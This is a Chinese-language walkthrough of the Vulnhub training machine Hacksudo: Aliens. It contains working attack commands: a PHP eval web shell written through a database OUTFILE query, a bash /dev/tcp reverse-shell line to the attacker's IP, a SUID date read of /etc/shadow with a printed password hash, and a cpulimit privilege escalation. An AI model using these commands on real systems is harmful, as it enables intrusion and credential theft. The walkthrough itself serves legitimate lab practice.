看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens

简介: 看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens

67087c6d147b474187af6b7ce50b5c29.pngVulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:需要获得root权限找到flag


Difficulty:Easy (简单的)

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/hacksudo/HacksudoAliens.zip



Vulnhub靶机安装:

下载好了把安装包解压 然后使用 VMware或者Oracle VM打开即可。




Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机


透机:kali IP :172.20.10.5 靶机IP :172.20.10.11

使用命令:nmap -sS -sV -n -T4 -p- 172.20.10.11



开启了22、80、9000老样子先看80 访问一下 然后扫后台使用工具:dirb,dirsearch,gobuster

这里扫出来个数据库的备份文件,查看发现账号和密码:vishal/hacksudo


9b611a02f1104812b88beb0e20b044f1.png


6300b72ac28245318ca4f31ebaf0d587.png


②:数据库后台传木马:

访问9000端口,输入账号密码登入数据库后台 登入成功!!

可以尝试写入一句话木马

 select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE '/var/www/html/cmd.php'



67087c6d147b474187af6b7ce50b5c29.png

e148803b8da1466b97f09f5796c951c7.png

③:反弹shell:
 bash -c 'exec bash -i &>/dev/tcp/172.20.10.5/1234 <&1'
 python3 -c ‘import pty;pty.spawn(“/bin/bash”)’


49e69243d42f4db283d70b6376e46b4f.png

f984fe6771fd435c8e8a42e322620a1f.png


④:提权:
find / -user root -perm -4000 -print 2>/dev/null


1.date提权:

GTFOBins-datehttps://gtfobins.github.io/gtfobins/date/#suid

这里使用date 进行越权操作 读取shadow 然后john进行爆破


LFILE=/etc/shadow
date -f $LFILE


611478cbb7c14888bb7fefb715753786.png

2.cpulimit 提权
echo hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7::: >> hash.txt


9f20696807d943efbcd3e08ab64b650c.png


hacksudo的密码为:aliens直接ssh登录,登入成功!!

发现没权限在Downloads 下面发现 cpulimit二进制文件 GTFOBins搜一下还真有!


GTFOBins-cpulimithttps://gtfobins.github.io/gtfobins/cpulimit/


⑤:获取FLAG:

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!



Vulnhub靶机渗透总结:


1.信息收集dirb,dirsearch,gobuster,nikto 工具得使用

2. phpmyadmin后台写文件getshell(一句话木马)

3.date 读取shadow 和john解密shadow

4.cpulimit和date 提权的使用

5.反弹shell 命令: bash -c 'exec bash -i &>/dev/tcp/172.20.10.5/1234 <&1'


🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
5月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
102 0
|
5月前
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
37 0
|
5月前
|
安全 Oracle 机器人
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
47 0
|
5月前
|
SQL 安全 Oracle
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
55 0
|
5月前
|
安全 Shell 网络安全
看完这篇 教你玩转渗透测试靶机Vulnhub——Photographer: 1
看完这篇 教你玩转渗透测试靶机Vulnhub——Photographer: 1
47 0
|
2月前
|
设计模式 Java 测试技术
软件测试/测试开发/全日制|Page Object模式:为什么它是Web自动化测试的必备工具
软件测试/测试开发/全日制|Page Object模式:为什么它是Web自动化测试的必备工具
44 0
|
4天前
|
安全 网络协议 测试技术
安全测试工具之nmap使用指南
【2月更文挑战第7天】安全测试工具之nmap使用指南
25 2
安全测试工具之nmap使用指南
|
5天前
|
测试技术 Python
图形化渗透测试工具 -- GUI_Tools
图形化渗透测试工具 -- GUI_Tools
10 0
|
8天前
|
Web App开发 测试技术 数据安全/隐私保护
Web自动化测试工具Selenium
Web自动化测试工具Selenium
|
9天前
|
SQL 安全 Java
安全测试之推荐工具
【2月更文挑战第2天】安全测试之推荐工具
58 2